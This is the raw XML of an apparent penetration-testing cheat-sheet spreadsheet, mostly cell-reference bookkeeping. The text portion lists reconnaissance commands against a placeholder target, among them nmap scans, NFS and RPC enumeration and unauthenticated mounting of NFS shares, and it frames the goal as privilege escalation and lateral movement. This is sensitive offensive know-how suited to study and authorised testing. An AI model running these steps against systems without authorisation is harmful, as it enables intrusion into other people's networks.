  <c r="S67" i="37"/>
  <c r="S69" i="37"/>
  <c r="S55" i="37"/>
  <c r="S70" i="37"/>
  <c r="E7" i="27"/>
  <c r="E13" i="27"/>
  <c r="E19" i="27"/>
  <c r="E25" i="27"/>
  <c r="E31" i="27"/>
  <c r="E37" i="27"/>
  <c r="E8" i="27"/>
  <c r="E14" i="27"/>
  <c r="E20" i="27"/>
  <c r="E26" i="27"/>
  <c r="E32" i="27"/>
  <c r="E38" i="27"/>
  <c r="E3" i="27"/>
  <c r="E9" i="27"/>
  <c r="E15" i="27"/>
  <c r="E21" i="27"/>
  <c r="E27" i="27"/>
  <c r="E33" i="27"/>
  <c r="E39" i="27"/>
  <c r="E4" i="27"/>
  <c r="E10" i="27"/>
  <c r="E16" i="27"/>
  <c r="E22" i="27"/>
  <c r="E28" i="27"/>
  <c r="E34" i="27"/>
  <c r="E40" i="27"/>
  <c r="E5" i="27"/>
  <c r="E11" i="27"/>
  <c r="E17" i="27"/>
  <c r="E23" i="27"/>
  <c r="E29" i="27"/>
  <c r="E35" i="27"/>
  <c r="E41" i="27"/>
  <c r="E6" i="27"/>
  <c r="E12" i="27"/>
  <c r="E18" i="27"/>
  <c r="E24" i="27"/>
  <c r="E30" i="27"/>
  <c r="E36" i="27"/>
  <c r="E42" i="27"/>
  <c r="P53" i="37"/>
  <c r="K75" i="37"/>
  <c r="K74" i="37"/>
  <c r="G60" i="37"/>
  <c r="K61" i="37"/>
  <c r="K67" i="37"/>
  <c r="K73" i="37"/>
  <c r="K79" i="37"/>
  <c r="K90" i="37"/>
  <c r="K60" i="37"/>
  <c r="K96" i="37"/>
  <c r="K80" i="37"/>
  <c r="S68" i="37"/>
  <c r="K78" i="37"/>
  <c r="K92" i="37"/>
  <c r="K81" i="37"/>
  <c r="K68" i="37"/>
  <c r="G66" i="37"/>
  <c r="K59" i="37"/>
  <c r="K66" i="37"/>
  <c r="K72" i="37"/>
  <c r="K84" i="37"/>
  <c r="K58" i="37"/>
  <c r="K57" i="37"/>
  <c r="K65" i="37"/>
  <c r="K71" i="37"/>
  <c r="K77" i="37"/>
  <c r="K83" i="37"/>
  <c r="S99" i="37"/>
  <c r="K88" i="37"/>
  <c r="G70" i="37"/>
  <c r="G82" i="37"/>
  <c r="K89" i="37"/>
  <c r="C354" i="37"/>
  <c r="K55" i="37"/>
  <c r="K64" i="37"/>
  <c r="K70" i="37"/>
  <c r="K76" i="37"/>
  <c r="K82" i="37"/>
  <c r="G64" i="37"/>
  <c r="O54" i="37"/>
  <c r="P54" i="37" s="1"/>
  <c r="L54" i="37" l="1"/>
  <c r="L53" i="37"/>
  <c r="H57" i="37"/>
  <c r="H53" i="37"/>
  <c r="H58" i="37"/>
  <c r="H63" i="37"/>
  <c r="H54" i="37"/>
  <c r="H56" i="37"/>
  <c r="H59" i="37"/>
  <c r="H55" i="37"/>
  <c r="H60" i="37"/>
  <c r="L76" i="37"/>
  <c r="H81" i="37"/>
  <c r="H62" i="37"/>
  <c r="D134" i="37"/>
  <c r="L82" i="37"/>
  <c r="H69" i="37"/>
  <c r="L68" i="37"/>
  <c r="L59" i="37"/>
  <c r="L65" i="37"/>
  <c r="L66" i="37"/>
  <c r="H80" i="37"/>
  <c r="D243" i="37"/>
  <c r="D267" i="37"/>
  <c r="D132" i="37"/>
  <c r="D148" i="37"/>
  <c r="D300" i="37"/>
  <c r="D469" i="37"/>
  <c r="D473" i="37"/>
  <c r="T78" i="37"/>
  <c r="D423" i="37"/>
  <c r="D320" i="37"/>
  <c r="D245" i="37"/>
  <c r="D314" i="37"/>
  <c r="D114" i="37"/>
  <c r="D347" i="37"/>
  <c r="D552" i="37"/>
  <c r="D88" i="37"/>
  <c r="D584" i="37"/>
  <c r="T84" i="37"/>
  <c r="D503" i="37"/>
  <c r="D325" i="37"/>
  <c r="D293" i="37"/>
  <c r="D397" i="37"/>
  <c r="D358" i="37"/>
  <c r="D378" i="37"/>
  <c r="D569" i="37"/>
  <c r="D541" i="37"/>
  <c r="D348" i="37"/>
  <c r="D613" i="37"/>
  <c r="D351" i="37"/>
  <c r="D495" i="37"/>
  <c r="D567" i="37"/>
  <c r="D492" i="37"/>
  <c r="D197" i="37"/>
  <c r="T104" i="37"/>
  <c r="T57" i="37"/>
  <c r="T97" i="37"/>
  <c r="T66" i="37"/>
  <c r="T99" i="37"/>
  <c r="T55" i="37"/>
  <c r="T87" i="37"/>
  <c r="T68" i="37"/>
  <c r="T95" i="37"/>
  <c r="T64" i="37"/>
  <c r="T92" i="37"/>
  <c r="T73" i="37"/>
  <c r="T54" i="37"/>
  <c r="T72" i="37"/>
  <c r="D129" i="37"/>
  <c r="D440" i="37"/>
  <c r="D177" i="37"/>
  <c r="D512" i="37"/>
  <c r="T89" i="37"/>
  <c r="T58" i="37"/>
  <c r="T102" i="37"/>
  <c r="T62" i="37"/>
  <c r="T85" i="37"/>
  <c r="T60" i="37"/>
  <c r="T56" i="37"/>
  <c r="T70" i="37"/>
  <c r="T59" i="37"/>
  <c r="T53" i="37"/>
  <c r="T83" i="37"/>
  <c r="T96" i="37"/>
  <c r="D97" i="37"/>
  <c r="D231" i="37"/>
  <c r="D192" i="37"/>
  <c r="D133" i="37"/>
  <c r="D475" i="37"/>
  <c r="D501" i="37"/>
  <c r="D436" i="37"/>
  <c r="D278" i="37"/>
  <c r="D77" i="37"/>
  <c r="H82" i="37"/>
  <c r="D98" i="37"/>
  <c r="L71" i="37"/>
  <c r="D171" i="37"/>
  <c r="D93" i="37"/>
  <c r="D344" i="37"/>
  <c r="D539" i="37"/>
  <c r="D338" i="37"/>
  <c r="D389" i="37"/>
  <c r="D605" i="37"/>
  <c r="D372" i="37"/>
  <c r="D588" i="37"/>
  <c r="D96" i="37"/>
  <c r="D137" i="37"/>
  <c r="D203" i="37"/>
  <c r="D509" i="37"/>
  <c r="D326" i="37"/>
  <c r="D286" i="37"/>
  <c r="D528" i="37"/>
  <c r="D275" i="37"/>
  <c r="D337" i="37"/>
  <c r="D409" i="37"/>
  <c r="D481" i="37"/>
  <c r="D553" i="37"/>
  <c r="D380" i="37"/>
  <c r="D452" i="37"/>
  <c r="D524" i="37"/>
  <c r="D596" i="37"/>
  <c r="D363" i="37"/>
  <c r="D435" i="37"/>
  <c r="D507" i="37"/>
  <c r="D579" i="37"/>
  <c r="D205" i="37"/>
  <c r="D253" i="37"/>
  <c r="D301" i="37"/>
  <c r="D370" i="37"/>
  <c r="D442" i="37"/>
  <c r="D514" i="37"/>
  <c r="D586" i="37"/>
  <c r="D204" i="37"/>
  <c r="D175" i="37"/>
  <c r="T67" i="37"/>
  <c r="D228" i="37"/>
  <c r="D82" i="37"/>
  <c r="D522" i="37"/>
  <c r="D55" i="37"/>
  <c r="D174" i="37"/>
  <c r="D71" i="37"/>
  <c r="H71" i="37"/>
  <c r="H83" i="37"/>
  <c r="D226" i="37"/>
  <c r="D168" i="37"/>
  <c r="D72" i="37"/>
  <c r="T86" i="37"/>
  <c r="D468" i="37"/>
  <c r="L80" i="37"/>
  <c r="L72" i="37"/>
  <c r="L83" i="37"/>
  <c r="L94" i="37"/>
  <c r="D574" i="37"/>
  <c r="D111" i="37"/>
  <c r="D371" i="37"/>
  <c r="D510" i="37"/>
  <c r="D590" i="37"/>
  <c r="D573" i="37"/>
  <c r="D353" i="37"/>
  <c r="D78" i="37"/>
  <c r="L74" i="37"/>
  <c r="L86" i="37"/>
  <c r="D91" i="37"/>
  <c r="D147" i="37"/>
  <c r="D79" i="37"/>
  <c r="D360" i="37"/>
  <c r="D557" i="37"/>
  <c r="D354" i="37"/>
  <c r="D407" i="37"/>
  <c r="D198" i="37"/>
  <c r="D390" i="37"/>
  <c r="D606" i="37"/>
  <c r="D99" i="37"/>
  <c r="D141" i="37"/>
  <c r="D216" i="37"/>
  <c r="D527" i="37"/>
  <c r="D342" i="37"/>
  <c r="D311" i="37"/>
  <c r="D546" i="37"/>
  <c r="D279" i="37"/>
  <c r="D343" i="37"/>
  <c r="D415" i="37"/>
  <c r="D487" i="37"/>
  <c r="D559" i="37"/>
  <c r="D386" i="37"/>
  <c r="D458" i="37"/>
  <c r="D530" i="37"/>
  <c r="D602" i="37"/>
  <c r="D369" i="37"/>
  <c r="D441" i="37"/>
  <c r="D513" i="37"/>
  <c r="D585" i="37"/>
  <c r="D209" i="37"/>
  <c r="D257" i="37"/>
  <c r="D305" i="37"/>
  <c r="D376" i="37"/>
  <c r="D448" i="37"/>
  <c r="D520" i="37"/>
  <c r="D592" i="37"/>
  <c r="D180" i="37"/>
  <c r="D151" i="37"/>
  <c r="D215" i="37"/>
  <c r="D76" i="37"/>
  <c r="D196" i="37"/>
  <c r="D164" i="37"/>
  <c r="D65" i="37"/>
  <c r="H72" i="37"/>
  <c r="H84" i="37"/>
  <c r="T88" i="37"/>
  <c r="D124" i="37"/>
  <c r="D154" i="37"/>
  <c r="D66" i="37"/>
  <c r="T90" i="37"/>
  <c r="D61" i="37"/>
  <c r="L61" i="37"/>
  <c r="L78" i="37"/>
  <c r="L85" i="37"/>
  <c r="D292" i="37"/>
  <c r="D57" i="37"/>
  <c r="D92" i="37"/>
  <c r="D403" i="37"/>
  <c r="D429" i="37"/>
  <c r="D364" i="37"/>
  <c r="D89" i="37"/>
  <c r="D202" i="37"/>
  <c r="H70" i="37"/>
  <c r="D178" i="37"/>
  <c r="D504" i="37"/>
  <c r="D80" i="37"/>
  <c r="D81" i="37"/>
  <c r="D123" i="37"/>
  <c r="D187" i="37"/>
  <c r="D368" i="37"/>
  <c r="D575" i="37"/>
  <c r="D362" i="37"/>
  <c r="D425" i="37"/>
  <c r="D211" i="37"/>
  <c r="D408" i="37"/>
  <c r="D220" i="37"/>
  <c r="D101" i="37"/>
  <c r="D145" i="37"/>
  <c r="D238" i="37"/>
  <c r="D545" i="37"/>
  <c r="D350" i="37"/>
  <c r="D335" i="37"/>
  <c r="D564" i="37"/>
  <c r="D283" i="37"/>
  <c r="D349" i="37"/>
  <c r="D421" i="37"/>
  <c r="D493" i="37"/>
  <c r="D565" i="37"/>
  <c r="D392" i="37"/>
  <c r="D464" i="37"/>
  <c r="D536" i="37"/>
  <c r="D608" i="37"/>
  <c r="D375" i="37"/>
  <c r="D447" i="37"/>
  <c r="D519" i="37"/>
  <c r="D591" i="37"/>
  <c r="D213" i="37"/>
  <c r="D261" i="37"/>
  <c r="D310" i="37"/>
  <c r="D382" i="37"/>
  <c r="D454" i="37"/>
  <c r="D526" i="37"/>
  <c r="D598" i="37"/>
  <c r="D127" i="37"/>
  <c r="T61" i="37"/>
  <c r="D191" i="37"/>
  <c r="D70" i="37"/>
  <c r="D184" i="37"/>
  <c r="D150" i="37"/>
  <c r="H73" i="37"/>
  <c r="D90" i="37"/>
  <c r="T81" i="37"/>
  <c r="D85" i="37"/>
  <c r="D144" i="37"/>
  <c r="H61" i="37"/>
  <c r="T94" i="37"/>
  <c r="D119" i="37"/>
  <c r="L67" i="37"/>
  <c r="L84" i="37"/>
  <c r="L56" i="37"/>
  <c r="L89" i="37"/>
  <c r="D587" i="37"/>
  <c r="D357" i="37"/>
  <c r="D302" i="37"/>
  <c r="D593" i="37"/>
  <c r="D219" i="37"/>
  <c r="D443" i="37"/>
  <c r="D224" i="37"/>
  <c r="D426" i="37"/>
  <c r="D242" i="37"/>
  <c r="D103" i="37"/>
  <c r="D149" i="37"/>
  <c r="D266" i="37"/>
  <c r="D563" i="37"/>
  <c r="D366" i="37"/>
  <c r="D359" i="37"/>
  <c r="D582" i="37"/>
  <c r="D287" i="37"/>
  <c r="D355" i="37"/>
  <c r="D427" i="37"/>
  <c r="D499" i="37"/>
  <c r="D571" i="37"/>
  <c r="D398" i="37"/>
  <c r="D470" i="37"/>
  <c r="D542" i="37"/>
  <c r="D614" i="37"/>
  <c r="D381" i="37"/>
  <c r="D453" i="37"/>
  <c r="D525" i="37"/>
  <c r="D597" i="37"/>
  <c r="D217" i="37"/>
  <c r="D265" i="37"/>
  <c r="D316" i="37"/>
  <c r="D388" i="37"/>
  <c r="D460" i="37"/>
  <c r="D532" i="37"/>
  <c r="D604" i="37"/>
  <c r="D104" i="37"/>
  <c r="D170" i="37"/>
  <c r="D64" i="37"/>
  <c r="D54" i="37"/>
  <c r="D179" i="37"/>
  <c r="D56" i="37"/>
  <c r="D140" i="37"/>
  <c r="H74" i="37"/>
  <c r="D59" i="37"/>
  <c r="D67" i="37"/>
  <c r="D130" i="37"/>
  <c r="D450" i="37"/>
  <c r="D143" i="37"/>
  <c r="L73" i="37"/>
  <c r="L92" i="37"/>
  <c r="L75" i="37"/>
  <c r="L93" i="37"/>
  <c r="D558" i="37"/>
  <c r="D183" i="37"/>
  <c r="D318" i="37"/>
  <c r="D518" i="37"/>
  <c r="D580" i="37"/>
  <c r="D156" i="37"/>
  <c r="D68" i="37"/>
  <c r="D108" i="37"/>
  <c r="D222" i="37"/>
  <c r="D395" i="37"/>
  <c r="D611" i="37"/>
  <c r="D232" i="37"/>
  <c r="D461" i="37"/>
  <c r="D246" i="37"/>
  <c r="D444" i="37"/>
  <c r="D256" i="37"/>
  <c r="D105" i="37"/>
  <c r="D153" i="37"/>
  <c r="D290" i="37"/>
  <c r="D581" i="37"/>
  <c r="D186" i="37"/>
  <c r="D384" i="37"/>
  <c r="D600" i="37"/>
  <c r="D291" i="37"/>
  <c r="D361" i="37"/>
  <c r="D433" i="37"/>
  <c r="D505" i="37"/>
  <c r="D577" i="37"/>
  <c r="D404" i="37"/>
  <c r="D476" i="37"/>
  <c r="D548" i="37"/>
  <c r="D315" i="37"/>
  <c r="D387" i="37"/>
  <c r="D459" i="37"/>
  <c r="D531" i="37"/>
  <c r="D603" i="37"/>
  <c r="D221" i="37"/>
  <c r="D269" i="37"/>
  <c r="D322" i="37"/>
  <c r="D394" i="37"/>
  <c r="D466" i="37"/>
  <c r="D538" i="37"/>
  <c r="D610" i="37"/>
  <c r="D75" i="37"/>
  <c r="D160" i="37"/>
  <c r="D163" i="37"/>
  <c r="D155" i="37"/>
  <c r="D126" i="37"/>
  <c r="H75" i="37"/>
  <c r="T77" i="37"/>
  <c r="T75" i="37"/>
  <c r="D120" i="37"/>
  <c r="D58" i="37"/>
  <c r="D194" i="37"/>
  <c r="D218" i="37"/>
  <c r="L79" i="37"/>
  <c r="L81" i="37"/>
  <c r="L57" i="37"/>
  <c r="L97" i="37"/>
  <c r="D240" i="37"/>
  <c r="D356" i="37"/>
  <c r="D331" i="37"/>
  <c r="D297" i="37"/>
  <c r="D102" i="37"/>
  <c r="D176" i="37"/>
  <c r="D62" i="37"/>
  <c r="D235" i="37"/>
  <c r="D413" i="37"/>
  <c r="D210" i="37"/>
  <c r="D250" i="37"/>
  <c r="D479" i="37"/>
  <c r="D270" i="37"/>
  <c r="D462" i="37"/>
  <c r="D280" i="37"/>
  <c r="D109" i="37"/>
  <c r="D157" i="37"/>
  <c r="D383" i="37"/>
  <c r="D599" i="37"/>
  <c r="D234" i="37"/>
  <c r="D402" i="37"/>
  <c r="D247" i="37"/>
  <c r="D295" i="37"/>
  <c r="D367" i="37"/>
  <c r="D439" i="37"/>
  <c r="D511" i="37"/>
  <c r="D583" i="37"/>
  <c r="D410" i="37"/>
  <c r="D482" i="37"/>
  <c r="D554" i="37"/>
  <c r="D321" i="37"/>
  <c r="D393" i="37"/>
  <c r="D465" i="37"/>
  <c r="D537" i="37"/>
  <c r="D609" i="37"/>
  <c r="D225" i="37"/>
  <c r="D273" i="37"/>
  <c r="D328" i="37"/>
  <c r="D400" i="37"/>
  <c r="D472" i="37"/>
  <c r="D544" i="37"/>
  <c r="D617" i="37"/>
  <c r="D94" i="37"/>
  <c r="D110" i="37"/>
  <c r="D146" i="37"/>
  <c r="D139" i="37"/>
  <c r="D131" i="37"/>
  <c r="D116" i="37"/>
  <c r="H64" i="37"/>
  <c r="H76" i="37"/>
  <c r="D486" i="37"/>
  <c r="D106" i="37"/>
  <c r="D115" i="37"/>
  <c r="D414" i="37"/>
  <c r="L90" i="37"/>
  <c r="L88" i="37"/>
  <c r="L77" i="37"/>
  <c r="D430" i="37"/>
  <c r="D336" i="37"/>
  <c r="D190" i="37"/>
  <c r="D374" i="37"/>
  <c r="D508" i="37"/>
  <c r="D244" i="37"/>
  <c r="D540" i="37"/>
  <c r="D431" i="37"/>
  <c r="D223" i="37"/>
  <c r="D274" i="37"/>
  <c r="D497" i="37"/>
  <c r="D294" i="37"/>
  <c r="D480" i="37"/>
  <c r="D304" i="37"/>
  <c r="D113" i="37"/>
  <c r="D161" i="37"/>
  <c r="D401" i="37"/>
  <c r="D199" i="37"/>
  <c r="D182" i="37"/>
  <c r="D420" i="37"/>
  <c r="D251" i="37"/>
  <c r="D299" i="37"/>
  <c r="D373" i="37"/>
  <c r="D445" i="37"/>
  <c r="D517" i="37"/>
  <c r="D589" i="37"/>
  <c r="D416" i="37"/>
  <c r="D488" i="37"/>
  <c r="D560" i="37"/>
  <c r="D327" i="37"/>
  <c r="D399" i="37"/>
  <c r="D471" i="37"/>
  <c r="D543" i="37"/>
  <c r="D181" i="37"/>
  <c r="D229" i="37"/>
  <c r="D277" i="37"/>
  <c r="D334" i="37"/>
  <c r="D406" i="37"/>
  <c r="D478" i="37"/>
  <c r="D550" i="37"/>
  <c r="D618" i="37"/>
  <c r="D53" i="37"/>
  <c r="D86" i="37"/>
  <c r="T71" i="37"/>
  <c r="D136" i="37"/>
  <c r="T82" i="37"/>
  <c r="D107" i="37"/>
  <c r="D612" i="37"/>
  <c r="T103" i="37"/>
  <c r="H65" i="37"/>
  <c r="H77" i="37"/>
  <c r="D227" i="37"/>
  <c r="T69" i="37"/>
  <c r="D576" i="37"/>
  <c r="T100" i="37"/>
  <c r="D239" i="37"/>
  <c r="D206" i="37"/>
  <c r="D167" i="37"/>
  <c r="L60" i="37"/>
  <c r="L96" i="37"/>
  <c r="L55" i="37"/>
  <c r="D84" i="37"/>
  <c r="D118" i="37"/>
  <c r="D570" i="37"/>
  <c r="D271" i="37"/>
  <c r="D201" i="37"/>
  <c r="D74" i="37"/>
  <c r="D162" i="37"/>
  <c r="D258" i="37"/>
  <c r="D152" i="37"/>
  <c r="D296" i="37"/>
  <c r="D69" i="37"/>
  <c r="D282" i="37"/>
  <c r="D449" i="37"/>
  <c r="D236" i="37"/>
  <c r="D298" i="37"/>
  <c r="D515" i="37"/>
  <c r="D309" i="37"/>
  <c r="D498" i="37"/>
  <c r="D317" i="37"/>
  <c r="D117" i="37"/>
  <c r="D165" i="37"/>
  <c r="D419" i="37"/>
  <c r="D212" i="37"/>
  <c r="D195" i="37"/>
  <c r="D438" i="37"/>
  <c r="D255" i="37"/>
  <c r="D303" i="37"/>
  <c r="D379" i="37"/>
  <c r="D451" i="37"/>
  <c r="D523" i="37"/>
  <c r="D595" i="37"/>
  <c r="D422" i="37"/>
  <c r="D494" i="37"/>
  <c r="D566" i="37"/>
  <c r="D333" i="37"/>
  <c r="D405" i="37"/>
  <c r="D477" i="37"/>
  <c r="D549" i="37"/>
  <c r="D185" i="37"/>
  <c r="D233" i="37"/>
  <c r="D281" i="37"/>
  <c r="D340" i="37"/>
  <c r="D412" i="37"/>
  <c r="D484" i="37"/>
  <c r="D556" i="37"/>
  <c r="D615" i="37"/>
  <c r="D73" i="37"/>
  <c r="D432" i="37"/>
  <c r="D122" i="37"/>
  <c r="T76" i="37"/>
  <c r="D396" i="37"/>
  <c r="T98" i="37"/>
  <c r="H66" i="37"/>
  <c r="H78" i="37"/>
  <c r="D214" i="37"/>
  <c r="D268" i="37"/>
  <c r="D95" i="37"/>
  <c r="D172" i="37"/>
  <c r="D100" i="37"/>
  <c r="L87" i="37"/>
  <c r="L64" i="37"/>
  <c r="D502" i="37"/>
  <c r="D330" i="37"/>
  <c r="D491" i="37"/>
  <c r="D547" i="37"/>
  <c r="D249" i="37"/>
  <c r="D200" i="37"/>
  <c r="D138" i="37"/>
  <c r="D166" i="37"/>
  <c r="D63" i="37"/>
  <c r="D306" i="37"/>
  <c r="D467" i="37"/>
  <c r="D264" i="37"/>
  <c r="D308" i="37"/>
  <c r="D533" i="37"/>
  <c r="D324" i="37"/>
  <c r="D516" i="37"/>
  <c r="D341" i="37"/>
  <c r="D121" i="37"/>
  <c r="D169" i="37"/>
  <c r="D437" i="37"/>
  <c r="D252" i="37"/>
  <c r="D208" i="37"/>
  <c r="D456" i="37"/>
  <c r="D259" i="37"/>
  <c r="D313" i="37"/>
  <c r="D385" i="37"/>
  <c r="D457" i="37"/>
  <c r="D529" i="37"/>
  <c r="D601" i="37"/>
  <c r="D428" i="37"/>
  <c r="D500" i="37"/>
  <c r="D572" i="37"/>
  <c r="D339" i="37"/>
  <c r="D411" i="37"/>
  <c r="D483" i="37"/>
  <c r="D555" i="37"/>
  <c r="D189" i="37"/>
  <c r="D237" i="37"/>
  <c r="D285" i="37"/>
  <c r="D346" i="37"/>
  <c r="D418" i="37"/>
  <c r="D490" i="37"/>
  <c r="D562" i="37"/>
  <c r="D616" i="37"/>
  <c r="D60" i="37"/>
  <c r="T79" i="37"/>
  <c r="D329" i="37"/>
  <c r="D112" i="37"/>
  <c r="T74" i="37"/>
  <c r="T80" i="37"/>
  <c r="D284" i="37"/>
  <c r="T93" i="37"/>
  <c r="H67" i="37"/>
  <c r="H79" i="37"/>
  <c r="D159" i="37"/>
  <c r="T63" i="37"/>
  <c r="D254" i="37"/>
  <c r="T91" i="37"/>
  <c r="D158" i="37"/>
  <c r="L63" i="37"/>
  <c r="L95" i="37"/>
  <c r="L58" i="37"/>
  <c r="L70" i="37"/>
  <c r="D83" i="37"/>
  <c r="D521" i="37"/>
  <c r="D262" i="37"/>
  <c r="D446" i="37"/>
  <c r="D272" i="37"/>
  <c r="D377" i="37"/>
  <c r="D128" i="37"/>
  <c r="D142" i="37"/>
  <c r="D594" i="37"/>
  <c r="D312" i="37"/>
  <c r="D485" i="37"/>
  <c r="D288" i="37"/>
  <c r="D323" i="37"/>
  <c r="D551" i="37"/>
  <c r="D332" i="37"/>
  <c r="D534" i="37"/>
  <c r="D365" i="37"/>
  <c r="D125" i="37"/>
  <c r="D173" i="37"/>
  <c r="D455" i="37"/>
  <c r="D276" i="37"/>
  <c r="D230" i="37"/>
  <c r="D474" i="37"/>
  <c r="D263" i="37"/>
  <c r="D319" i="37"/>
  <c r="D391" i="37"/>
  <c r="D463" i="37"/>
  <c r="D535" i="37"/>
  <c r="D607" i="37"/>
  <c r="D434" i="37"/>
  <c r="D506" i="37"/>
  <c r="D578" i="37"/>
  <c r="D345" i="37"/>
  <c r="D417" i="37"/>
  <c r="D489" i="37"/>
  <c r="D561" i="37"/>
  <c r="D193" i="37"/>
  <c r="D241" i="37"/>
  <c r="D289" i="37"/>
  <c r="D352" i="37"/>
  <c r="D424" i="37"/>
  <c r="D496" i="37"/>
  <c r="D568" i="37"/>
  <c r="T65" i="37"/>
  <c r="D307" i="37"/>
  <c r="T101" i="37"/>
  <c r="D188" i="37"/>
  <c r="D248" i="37"/>
  <c r="H68" i="37"/>
  <c r="D135" i="37"/>
  <c r="D207" i="37"/>
  <c r="D87" i="37"/>
  <c r="D260" i="37"/>
  <c r="L62" i="37"/>
  <c r="L91" i="37"/>
  <c r="L69" i="37"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="71256" uniqueCount="22798">
  <si>
    <t>New Kali IP</t>
  </si>
  <si>
    <t>New Target IP</t>
  </si>
  <si>
    <t>New iface</t>
  </si>
  <si>
    <t>Current Kali IP</t>
  </si>
  <si>
    <t>&lt;kali_ip&gt;</t>
  </si>
  <si>
    <t>Current Target IP</t>
  </si>
  <si>
    <t>&lt;target_ip&gt;</t>
  </si>
  <si>
    <t>Current iface</t>
  </si>
  <si>
    <t>&lt;iface&gt;</t>
  </si>
  <si>
    <t>OS</t>
  </si>
  <si>
    <t>tool/lang/tech</t>
  </si>
  <si>
    <t>Category 2</t>
  </si>
  <si>
    <t>Category 3</t>
  </si>
  <si>
    <t>Service</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>Comment</t>
  </si>
  <si>
    <t>Keyword</t>
  </si>
  <si>
    <t xml:space="preserve">Information </t>
  </si>
  <si>
    <t xml:space="preserve"> Description</t>
  </si>
  <si>
    <t>110 / 143 / 993 / 995 - POP3(s)/IMAP(s)</t>
  </si>
  <si>
    <t xml:space="preserve"> Process</t>
  </si>
  <si>
    <t>80 / 443 - HTTP/S</t>
  </si>
  <si>
    <t>Web Application</t>
  </si>
  <si>
    <t>Payload All the Things Cheatsheet</t>
  </si>
  <si>
    <t>https://github.com/swisskyrepo/PayloadsAllTheThings</t>
  </si>
  <si>
    <t>Contains a lot of information about web app pentesting</t>
  </si>
  <si>
    <t>Burpsuite</t>
  </si>
  <si>
    <t>Local File Inclusion</t>
  </si>
  <si>
    <t>LFI Shell</t>
  </si>
  <si>
    <t>https://medium.com/@ratiros01/tryhackme-lfi-basics-1c8194f30c61</t>
  </si>
  <si>
    <t>Remote Enumeration</t>
  </si>
  <si>
    <t>Windows/ Linux</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>OS Detection</t>
  </si>
  <si>
    <t>ANY</t>
  </si>
  <si>
    <t>nmap -O --osscan-guess &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>Detect the operating system on a target machine</t>
  </si>
  <si>
    <t>Local Enumeration</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>Network Enumeration</t>
  </si>
  <si>
    <t>ifconfig -a</t>
  </si>
  <si>
    <t>Gather information about the current machines network interfaces</t>
  </si>
  <si>
    <t>Information</t>
  </si>
  <si>
    <t xml:space="preserve">Local enumeration/ privilege escalation:
Try to obtain SYSTEM privileges on the machine. 
Assumes we have access to a machine:
- as a low privileged user or high privileged user
- via a shell
- through a web app 
with the ultimate goal of obtaining higher level access to our current machine, and access to other machines within an environment as a result of information obtained from our exploited host. </t>
  </si>
  <si>
    <t>ifconfig is a tool to gather information about network interfaces</t>
  </si>
  <si>
    <t>route</t>
  </si>
  <si>
    <t xml:space="preserve">Route is used to print our current network routes, which includes our gateway. </t>
  </si>
  <si>
    <t>traceroute</t>
  </si>
  <si>
    <t>Used to find how many hops between a machine and another network device.</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>traceroute -n &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>DNS Enumeration</t>
  </si>
  <si>
    <t>53 - DNS</t>
  </si>
  <si>
    <t>cat /etc/resolv.conf</t>
  </si>
  <si>
    <t xml:space="preserve">Find what machine is resolving our DNS queries. </t>
  </si>
  <si>
    <t>ARP</t>
  </si>
  <si>
    <t>ARP Enumeration</t>
  </si>
  <si>
    <t xml:space="preserve">ARP </t>
  </si>
  <si>
    <t xml:space="preserve">arp -en/ arp -a </t>
  </si>
  <si>
    <t>Used to give SA of machines near us (in the same LAN) or machines that our
machine currently communicates with. 
Lists ARP cache</t>
  </si>
  <si>
    <t>SQL Map</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS)</t>
  </si>
  <si>
    <t>nmap -v -sT -O &lt;target_ip&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Scans for versions. To enumerate if Linux etc, check what services are running
and see if they are unique to Windows/ Linux. </t>
  </si>
  <si>
    <t>Service Detection</t>
  </si>
  <si>
    <t>nmap -sV &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>Network File System (NFS)</t>
  </si>
  <si>
    <t>2049 - Network File System (NFS)</t>
  </si>
  <si>
    <t>RPC based file sharing protocl used to provide access to shared resources. Relies on other RPC services such as 'mountd'. 
An admin wanting to share files from an NFS server will configure 'exports'. Export directories. 
Misconfigured 'export' directories (with a * at the end) allow any host or IP to connect w/o authentication, and possibly provide write access</t>
  </si>
  <si>
    <t>NFS Enumeration</t>
  </si>
  <si>
    <t>nmap --script nfs-ls,nfs-showmount,nfs-statfs &lt;target_ip&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Show the mounts/ exports of an NFS directory or remote machine. If directory have a * means any ip can mount the export. </t>
  </si>
  <si>
    <t>showmount</t>
  </si>
  <si>
    <t>showmount -e &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>mount</t>
  </si>
  <si>
    <t>mount -t nfs &lt;NFS Server IP&gt;:/NFS SHARE &lt;directory on your machine&gt; -o nolock</t>
  </si>
  <si>
    <t>Mount an NFS share to your machine</t>
  </si>
  <si>
    <t>portmapper/ rpcbind</t>
  </si>
  <si>
    <t>111 - RPC</t>
  </si>
  <si>
    <t xml:space="preserve">Portmapper is used to map RPC. Essentially, portmap can offer insight regarding ports that are listening on the machine
but that may not necessarily be accessible over the network. 
Helps when local access to machine is obtained. </t>
  </si>
  <si>
    <t>RPC Enumeration</t>
  </si>
  <si>
    <t>nmap --script rpc-grind,rpcinfo &lt;target_ip&gt; -p 111</t>
  </si>
  <si>
    <t>Enumerate all portmapper and associated RPC services,</t>
  </si>
  <si>
    <t>rpcinfo</t>
  </si>
  <si>
    <t xml:space="preserve">rpcinfo -p &lt;target_ip&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> Ports</t>
  </si>
  <si>
    <t>137/ 138/ 139/ 445 - NetBIOS, SMB and Samba</t>
  </si>
  <si>
    <t>137/tcp = netbios-ns [NetBIOS Name service]
137/udp = netbios-ns 
138/tcp = netbios-dgm [NETBIOS Datagram service]
138/udp = netbios-dgm 
139/tcp = netbios-ssn [NETBIOS Session Service]
139/udp = netbios-ssn
